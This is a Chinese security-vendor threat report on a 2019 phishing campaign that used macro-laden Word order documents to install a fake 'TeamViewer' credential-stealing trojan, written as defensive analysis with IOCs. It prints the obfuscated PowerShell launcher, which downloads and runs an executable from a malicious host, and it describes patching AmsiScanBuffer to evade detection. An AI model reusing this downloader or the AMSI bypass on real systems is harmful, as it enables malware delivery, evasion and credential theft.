新年伊始,“商贸信”病毒再次攻击我国电子消费品贸易公司

2019-02-19 11:31:22
新年伊始,腾讯御见威胁情报中心再次捕获“商贸信”病毒的最新攻击样本。攻击者将带有宏病毒的word文档作为邮件附件,向消费电子产品、玩具生产销售贸易等公司发送订单咨询相关邮件,并在邮件中提示启用文档中的宏。一旦文档中的宏被点击启用,恶意宏代码会启动Powershell脚本下载假冒Teamview......
一、背景
“商贸信”病毒最早由腾讯御见情报中心于2017年12月发现,其特点为针对外贸行业的,利用带有漏洞攻击代码的Word文档伪装成采购清单、帐单等文件,通过邮件在全球外贸行业内大量传播,高峰时期仅一天时间国内就有约10万多用户收到此类钓鱼邮件。

新年伊始,腾讯御见威胁情报中心再次捕获“商贸信”病毒的最新攻击样本。攻击者将带有宏病毒的word文档作为邮件附件,向消费电子产品、玩具生产销售贸易等公司发送订单咨询相关邮件,并在邮件中提示启用文档中的宏。一旦文档中的宏被点击启用,恶意宏代码会启动Powershell脚本下载假冒Teamview的窃密木马。该木马运行后会窃取用户浏览器和 其他多款网络客户端软件保存的账号密码、每两分钟获取一次电脑桌面截图,造成企业重要信息泄露。
“商贸信”变种病毒攻击流程

二、病毒通过邮件投放
根据截获的病毒攻击邮件统计,此次被攻击者主要集中在中国大陆(主要为深圳和广州)、中国香港、中国台湾,以及美国、爱尔兰、南美等多国目标。从行业来看,主要集中在消费电子产品生产销售行业和玩具生产销售行业,其次是物流公司。其中也有金融投行企业,如美国高盛集团、大都会人寿保险等。

钓鱼邮件内容如下图:

邮件内容包括运输、包装、发票等相关信息,特别强调需要确保在附件上启用“ENABLE CONTENT”,也就是启用文档附件中的宏,来增加目标中招的概率。

邮件包含带有宏病毒的文档PurchaseOrder#02_13_2019.doc,在使用office打开文档时,会提示是否启用内容,一旦启用就会导致宏病毒代码执行,导致木马被植入。

查看文档中的宏代码,发现其经过了混淆,在执行过程中会加载wscript.shell对象,准备执行环境。

继续执行会解密出powershell相关代码,随后拉起powershell.exe并传入脚本命令执行。

宏病毒代码启动Powershell.exe时附带参数信息如下:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile 
function aa616 {
param($mddccb)
$k2e2b5 = 'y31898a';
$j5bbae = '';
for ($i = 0; $i -lt $mddccb.length; $i+=2) {
$t7258 = [convert]::ToByte($mddccb.Substring($i, 2), 16);
$j5bbae += [char]($t7258 -bxor $k2e2b5[($i / 2) % $k2e2b5.length]);
}
return $j5bbae;
}
$q992 = '0c4058565e18320040455d54036c73464251575f412a4a424c5c554f2b465f4c505504577a5f4c5c4a0e0960544a4f51021c400a353348141b5f585b195b0d18404218495c054006053533436c7313111819184159136a7c55542814435e4a4d1043125643565c……………………
此处省略若干行
……………………
56570c621008591c110a1018445945045d5f0c4f35565f5f4d503c50083c321918415913111819184159134c3533356b5913111819184159131118194a040d464356195e051f55500334324159131118191841043e3b45';
$q9922 = aa616($q992);
Add-Type -TypeDefinition $q9922;
[pdd954]::c47ec9();

Start-Sleep -s 1;
$p253e = $env:APPDATA;
$k9c56 = $p253e + '\\t96f4b.exe';
If (test-path  $k9c56) {Remove-Item  $k9c56}; 
$gaa1a = New-Object System.Net.WebClient; 
$gaa1a.Headers['User-Agent'] = 'gaa1a'; 
$gaa1a.DownloadFile('http://mater.melatkinson.com/teamview.exe', $k9c56); 
Start-Process -Filepath $k9c56;

部分powershell代码被加密后保存在$q992中,运行时先调用aa616()进行解密,解密后代码如下:

然后执行解密代码中的函数c47ec9(),该函数通过LoadLibrary加载amsi.dll,并获取到缓冲区恶意代码扫描函数AmsiScanBuffer地址,去除该函数地址的写保护并进行Patch操作,使该函数失效从而达到躲避检测的目的。

Powershell脚本最后从hxxp://mater.melatkinson.com/teamview.exe下载木马保存到C:\Users\****\AppData\Roaming\t96f4b.exe,并启动执行。

三、窃密木马分析
附件下载的木马teamview.exe伪装为word文档图标

同时木马的文件名伪装为远程协助软件teamview.exe(此木马并非大名鼎鼎的teamview,只是文件名假冒)
 

木马采用C#编写,核心代码被加密保存,运行时通过解密函数解密并通过反射机制加载。

运行后拷贝自身到C:\Users\****\AppData\Roaming\MyApp\MyApp.exe并将其添加到启动项。

分析发现teamview.exe为窃密木马,通过读取浏览器以及客户端软件配置文件、注册表信息、sqlite数据库来获取用户登录账户密码信息,同时每隔两分钟获取用户屏幕截图,并将获取到的敏感信息上传。

中招可能遭到信息泄露的包括以下程序:
Chrome
Mozilla\Firefox
Mozilla\SeaMonkey
Flock\Browser
Thunderbird
Postbox
FileZilla
CoreFTP
FTP Navigator
Opera Stable
YandexBrowser
Apple Application Support
Dragon
Comodo
Foxmail
Opera Mail
WS_FTP
FlashFXP
SmartFTP
cftp
jDownloader


窃密木马同时还会获取用户实时电脑屏幕截图,截图频率为每两分钟一次

四、安全建议
1、不要随意打开来历不明的邮件附件;
2、高度警惕附带宏代码的Office文档,除非充分信任文件来源,否则不要启用宏代码;
3、使用杀毒软件拦截可能的病毒木马攻击;

4、推荐企业采用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

IOCs

Md5
687e8521357d458f3ed6042695045859
eb2dab936400c38909d82f341fe70349

URL
hxxp://mater.melatkinson.com/teamview.exe

最新资讯